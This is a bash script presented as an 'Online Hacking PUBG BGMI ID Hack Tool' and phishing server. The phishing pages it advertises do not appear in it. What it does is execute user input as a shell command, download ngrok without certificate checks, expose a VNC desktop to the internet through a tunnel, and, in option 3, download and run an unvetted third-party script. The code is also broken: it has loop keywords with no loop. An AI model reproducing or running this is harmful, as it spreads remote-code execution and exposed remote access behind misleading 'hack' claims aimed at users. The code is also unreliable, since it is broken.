#!/bin/bash
echo ""
clear
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip --no-check-certificate
unzip ngrok-stable-linux-amd64.zip
chmod 7777 ngrok
clear
echo ""
echo -e "\e[31m[\e[32m*\e[31m]\e[33m Visit \e[32mngrok.com \e[m "
echo ""
echo -e "\e[31m[\e[32m*\e[31m]\e[33m Sign up & get ngrok authtoken \e[m "
echo ""
sleep 1
echo ""
read -p $'\e[31m[\e[32m*\e[31m]\e[33m Enter The Ngrok Token [Ex. ./ngrok authtoken 1Y7IU ] : \e[0m' token
$token
echo
echo ""
printf "\e[31m[\e[32m★\e[31m]\e[32m This Tool is only educational purpose and we are not responsible for kind of illegal activity done by this tool\e[m "
echo ""
echo ""
read -p $'\e[1;40m\e[31m[\e[32m*\e[31m]\e[32m Accepted This Notice \e[1;91m (Y/N) : \e[0m' option
echo""
echo""
echo""

if [[ $option == *'N'* ]]; then
clear
exit
fi
if [[ $option == *'n'* ]]; then
clear
exit
fi

php="$(ps -efw | grep php | grep -v grep | awk '{print $2}')"
ngrok="$(ps -efw | grep ngrok | grep -v grep | awk '{print $2}')"
kill -9 $php
kill -9 $ngrok
clear
bash OnlineHacking/Logo.sh
bash OnlineHacking/Logo2.sh
echo ""
echo ""
                 echo -e $''   
                 read -p $'\e[1;91m[\e[0m\e[1;91m *** \e[0m\e[1;96m]\e[0m\e[1;96m  You Want to Choose Phishing Option  \e[1;91m  > : \e[0m' option
                 echo ""
		 if [ $option = 01 ] || [ $option = 1 ]
                 then 
                           
                           sudo apt install xfce4 xfce4-goodies xrdp -y
                           sudo apt install -y tightvncserver -y
                           vncserver
			   echo ""
                           printf "\e[31m[\e[32m★\e[31m]\e[32m This Phishing Page Only Pro User \e[m "
                           echo ""
                           echo ""
                           read -p $'\e[1;40m\e[31m[\e[32m*\e[31m]\e[32m Start VNC Server \e[1;91m (Y/N) : \e[0m' option
                           echo""
                           echo""
                           echo""

                           if [[ $option == *'Y'* ]]; then
                           vncserver
                           exit
                           fi
                           if [[ $option == *'Y'* ]]; then
                           vncserver
                           exit
                           fi
			   echo ""
                           echo -e $" [\e[92m*\e[91m]\e[1;93m Setting up Online Hacking PUBG BGMI ID Hack Tool ... \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m TURN ON MOBILE DATA & HOTSPOT OTHERWISE IT WILL NOT WORK ! \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[1;92m*\e[1;91m]\e[1;93m Online Hacking PUBG BGMI Phishing Server Connect... \e[0m   "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m PHP SERVER NOW STARTING ... \e[0m  "
                           echo ""
                           sleep 3
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m NGROK SERVER NOW STARTING ... \e[0m  "
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 25
                           clear
                           echo ""
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "[0-9a-z]*\.ngrok.io")
                           echo ""
                           echo ""
                           echo ""
echo -e "\e[92m
SUMAN ©\e[34m
         ██████╗ ███╗   ██╗██╗     ██╗███╗   ██╗███████╗    
        ██╔═══██╗████╗  ██║██║     ██║████╗  ██║██╔════╝    
        ██║   ██║██╔██╗ ██║██║     ██║██╔██╗ ██║█████╗      
        ██║   ██║██║╚██╗██║██║     ██║██║╚██╗██║██╔══╝      
        ╚██████╔╝██║ ╚████║███████╗██║██║ ╚████║███████╗    
         ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚═╝╚═╝  ╚═══╝╚══════╝    
                                                            
    ██╗  ██╗ █████╗  ██████╗██╗  ██╗██╗███╗   ██╗ ██████╗   
    ██║  ██║██╔══██╗██╔════╝██║ ██╔╝██║████╗  ██║██╔════╝   
    ███████║███████║██║     █████╔╝ ██║██╔██╗ ██║██║  ███╗  
    ██╔══██║██╔══██║██║     ██╔═██╗ ██║██║╚██╗██║██║   ██║  
    ██║  ██║██║  ██║╚██████╗██║  ██╗██║██║ ╚████║╚██████╔╝  
    ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝╚═╝  ╚═══╝ ╚═════╝   
ONLINE HACKING			  
							  							  
          \e[m"
echo -e " \e[36mWebsite : \e[0m\e[92mwww.onlinehacking.xyz \e[0m\n"
  
echo -e " \e[31mGitHub : \e[0m\e[93mhttps://github.com/OnlineHacKing \e[0m\n"

echo -e " \e[97mTelegram : \e[0m\e[34mhttps://telegram.dog/OnlineHacKing \e[0m\n"
		           echo ""
                           echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo ""
			   echo -e "\e[96m========================\e[92m    SUMAN © 2021    \e[96m=========================\e[92m"
                           echo ""
                           echo ""
                           echo "" 
                           read -p $'\e[1;40m\e[96m DO YOU WANT TO MODIFY URL ?\e[1;91m (Y/N) : \e[0m' option
                           echo ""
			   ./ngrok tcp 5901
                           echo ""
                           read -p $'\e[1;40m\e[31m[\e[32m*\e[31m]\e[32m Stop Server \e[1;91m (Y/N) : \e[0m' option
                           echo""
                           echo""
                           echo""

                           if [[ $option == *'y'* ]]; then
                           clear
                           vncserver -kill :1
                           vncserver -kill :2
                           exit
                           fi
                           if [[ $option == *'Y'* ]]; then
                           clear
                           vncserver -kill :1
                           vncserver -kill :2
                           exit
                           fi                           




	          break;
		  
                  elif [ $option = 02 ] || [ $option = 2 ]
	          then
	                          
                           echo ""
                           echo ""
                           printf "\e[31m[\e[32m★\e[31m]\e[32m This Phishing Page Only Pro User \e[m "
                           echo ""
                           echo ""
                           read -p $'\e[1;40m\e[31m[\e[32m*\e[31m]\e[32m Start VNC Server \e[1;91m (Y/N) : \e[0m' option
                           echo""
                           echo""
                           echo""

                           if [[ $option == *'Y'* ]]; then
                           vncserver
                           exit
                           fi
                           if [[ $option == *'Y'* ]]; then
                           vncserver
                           exit
                           fi
			   echo ""
                           echo -e $" [\e[92m*\e[91m]\e[1;93m Setting up Online Hacking PUBG BGMI ID Hack Tool ... \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m TURN ON MOBILE DATA & HOTSPOT OTHERWISE IT WILL NOT WORK ! \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[1;92m*\e[1;91m]\e[1;93m Online Hacking PUBG BGMI Phishing Server Connect... \e[0m   "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m PHP SERVER NOW STARTING ... \e[0m  "
                           echo ""
                           sleep 3
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m NGROK SERVER NOW STARTING ... \e[0m  "
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           sleep 25
                           clear
                           echo ""
                           link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "[0-9a-z]*\.ngrok.io")
                           echo ""
                           echo ""
                           echo ""
echo -e "\e[92m
SUMAN ©\e[34m
         ██████╗ ███╗   ██╗██╗     ██╗███╗   ██╗███████╗    
        ██╔═══██╗████╗  ██║██║     ██║████╗  ██║██╔════╝    
        ██║   ██║██╔██╗ ██║██║     ██║██╔██╗ ██║█████╗      
        ██║   ██║██║╚██╗██║██║     ██║██║╚██╗██║██╔══╝      
        ╚██████╔╝██║ ╚████║███████╗██║██║ ╚████║███████╗    
         ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚═╝╚═╝  ╚═══╝╚══════╝    
                                                            
    ██╗  ██╗ █████╗  ██████╗██╗  ██╗██╗███╗   ██╗ ██████╗   
    ██║  ██║██╔══██╗██╔════╝██║ ██╔╝██║████╗  ██║██╔════╝   
    ███████║███████║██║     █████╔╝ ██║██╔██╗ ██║██║  ███╗  
    ██╔══██║██╔══██║██║     ██╔═██╗ ██║██║╚██╗██║██║   ██║  
    ██║  ██║██║  ██║╚██████╗██║  ██╗██║██║ ╚████║╚██████╔╝  
    ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝╚═╝  ╚═══╝ ╚═════╝   
ONLINE HACKING			  
							  							  
          \e[m"
echo -e " \e[36mWebsite : \e[0m\e[92mwww.onlinehacking.xyz \e[0m\n"
  
echo -e " \e[31mGitHub : \e[0m\e[93mhttps://github.com/OnlineHacKing \e[0m\n"

echo -e " \e[97mTelegram : \e[0m\e[34mhttps://telegram.dog/OnlineHacKing \e[0m\n"
		           echo ""
                           echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo ""
			   echo -e "\e[96m========================\e[92m    SUMAN © 2021    \e[96m=========================\e[92m"
                           echo ""
                           echo ""
                           echo "" 
			   docker run -p 6079:80 dorowu/ubuntu-desktop-lxde-vnc
                           echo ""
                           echo ""
                           


                  break;
                  elif [ $option = 03 ] || [ $option = 3 ]
	          then
                           
                           echo ""
                           echo -e $" [\e[92m*\e[91m]\e[1;93m Setting up Online Hacking PUBG BGMI ID Hack Tool ... \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m Fetching server ... \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[1;92m*\e[1;91m]\e[1;93m Online Hacking PUBG BGMI Phishing Server Connect... \e[0m   "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m PHP SERVER NOW STARTING ... \e[0m  "
                           echo ""
                           sleep 3
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m NGROK SERVER NOW STARTING ... \e[0m  "
                           echo ""
			   sleep 3
			   echo -e $" [\e[92m*\e[91m]\e[1;93m TURN ON MOBILE DATA & HOTSPOT OTHERWISE IT WILL NOT WORK ! \e[0m  "
                           php -S 127.0.0.1:4444 > /dev/null 2>&1 &
                           wget https://raw.githubusercontent.com/dungphanx2/dungphan/master/CRD_COLAB_EXE.sh
chmod +x CRD_COLAB_EXE.sh
./CRD_COLAB_EXE.sh

                   break;		  

                elif [ $option = 99 ]
	        then     
	                 echo
       	                 exit 
		break;
		      
                else 
		  
		         echo
		         echo -e "\e[92m[\e[94m!\e[92m]\e[92m Invalid option Try Again !! \e[m "
		         sleep 2
                         exit
		         fi
                         done
